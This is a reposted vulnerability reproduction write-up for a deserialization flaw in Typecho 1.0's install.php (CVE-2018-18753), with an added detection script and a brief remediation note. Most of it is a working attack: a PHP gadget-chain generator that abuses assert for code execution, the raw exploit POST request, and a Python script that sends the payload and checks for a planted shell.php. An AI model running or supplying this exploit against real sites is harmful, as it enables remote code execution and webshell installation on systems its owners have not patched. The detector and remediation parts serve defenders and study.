Typecho CMS Deserialization Vulnerability (CVE-2018-18753) Reproduction

Introduction

Typecho is a blogging system whose framework differs from the usual MVC frameworks: the core code is built on a self-designed Widget base class, and the whole codebase is very compact.

Vulnerability overview

Typecho is a blog CMS. Its front-end install.php file contains a deserialization vulnerability: a crafted serialized string injected into it can execute arbitrary PHP code.

Affected version

Typecho 1.0 (14.10.10)

Environment setup

Download Typecho 14.10.10:

https://github.com/typecho/typecho/tags

Follow the default installation steps in order.

Installation complete.

Vulnerability reproduction

Create a poc.php file:

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();
    public function __construct(){
        $this->_params['screenName'] = 'phpinfo()';    // replace phpinfo() here for further exploitation
        $this->_filter[0] = 'assert';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

Run the script to obtain the PoC string.

Send the request:

POST /build/install.php?finish= HTTP/1.1
Host: 192.168.1.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 772
Origin: http://192.168.1.102
Connection: close
Referer: http://192.168.1.102/build/
Upgrade-Insecure-Requests: 1

__typecho_config=[payload]
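The request above is the only traffic the attack needs, so it is also the thing to detect: a POST to install.php with ?finish= carrying a __typecho_config parameter that base64-decodes to serialized PHP objects. The following checker is an added example written for this page, not code from the original post or from Typecho. It parses one request, decodes the parameter, and reports the class names of any serialized objects it finds. The serialized strings and request bodies in it are constructed for the example; they only mirror the shape of the page's gadget chain (an array whose 'adapter' is a Typecho_Feed that carries a Typecho_Request) and are not a working payload.

```python
import base64
import binascii
import re
from typing import Any, Dict, List, Optional
from urllib.parse import parse_qs, urlencode, urlsplit

# A serialized PHP object begins with  O:<name length>:"<ClassName>":
PHP_OBJECT_RE = re.compile(rb'O:\d+:"([A-Za-z0-9_\\]+)"')

# Constructed sample values (hypothetical, not a real payload). The first has the
# shape of the page's chain; the second is a plain array with no objects at all.
MALICIOUS_SERIALIZED = (
    b'a:2:{s:7:"adapter";O:12:"Typecho_Feed":1:{s:6:"author";'
    b'O:15:"Typecho_Request":0:{}}s:6:"prefix";s:8:"typecho_";}'
)
BENIGN_SERIALIZED = b'a:1:{s:6:"prefix";s:8:"typecho_";}'

# Constructed form bodies, encoded the way a browser or requests would send them.
SAMPLE_BODY = urlencode({"__typecho_config": base64.b64encode(MALICIOUS_SERIALIZED).decode()})
BENIGN_BODY = urlencode({"__typecho_config": base64.b64encode(BENIGN_SERIALIZED).decode()})


def decode_typecho_config(value: str) -> Optional[bytes]:
    """Base64-decode the __typecho_config value; None if it is not valid base64."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def classes_in_serialized(blob: bytes) -> List[str]:
    """Class names of every serialized PHP object in the blob, in order of appearance."""
    return [m.decode("ascii", "replace") for m in PHP_OBJECT_RE.findall(blob)]


def inspect_request(method: str, target: str, body: str) -> Dict[str, Any]:
    """Classify one HTTP request against the CVE-2018-18753 pattern: a POST to
    install.php (with ?finish=) whose __typecho_config parameter base64-decodes
    to PHP serialized data that contains objects."""
    verdict: Dict[str, Any] = {"suspicious": False, "classes": [], "reasons": []}
    parts = urlsplit(target)
    if method.upper() != "POST" or not parts.path.endswith("/install.php"):
        return verdict
    if "finish" in parse_qs(parts.query, keep_blank_values=True):
        verdict["reasons"].append("install.php?finish= reached")
    values = parse_qs(body, keep_blank_values=True).get("__typecho_config")
    if not values:
        return verdict
    blob = decode_typecho_config(values[0])
    if blob is None:
        verdict["reasons"].append("__typecho_config is not valid base64")
        return verdict
    classes = classes_in_serialized(blob)
    verdict["classes"] = classes
    if classes:
        # Config data for a fresh install has no reason to contain objects at all.
        verdict["suspicious"] = True
        verdict["reasons"].append("serialized PHP objects in __typecho_config: " + ", ".join(classes))
    return verdict


if __name__ == "__main__":
    for label, body in (("malicious", SAMPLE_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_request("POST", "/build/install.php?finish=", body))
```

The check deliberately keys on the presence of any serialized object rather than on the two class names from the page, since the same sink accepts other gadget chains; the class list is returned only to make the alert easier to triage. A stricter and simpler control is to remove install.php once installation is finished, which makes the request fail before any parameter is parsed.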

Create a poc.py file:

import requests
import sys

url = sys.argv[1]
path = "/install.php?finish="
print(url)
payload = "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"
postData = {"__typecho_config": payload}
header = {
    "Referer": url,
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0"}

# check that install.php is still reachable before sending anything
res = requests.get(url+path)
if res.status_code == 200:
    print("[+] install.php exist!")
else:
    print("[-] install.php not exist")
    sys.exit()

res = requests.post(url = url+path, data = postData, headers = header)
res = requests.get(url+"shell.php")
if res.status_code == 200:
    print("[+] Shell.php write success!")
    print("Shell path :", url+"shell.php")
else:
    print("[-] GetShell Error!")

A simple Python exploit.

Remediation

Upgrade to a patched version.


Reposted from blog.csdn.net/xuandao_ahfengren/article/details/111476577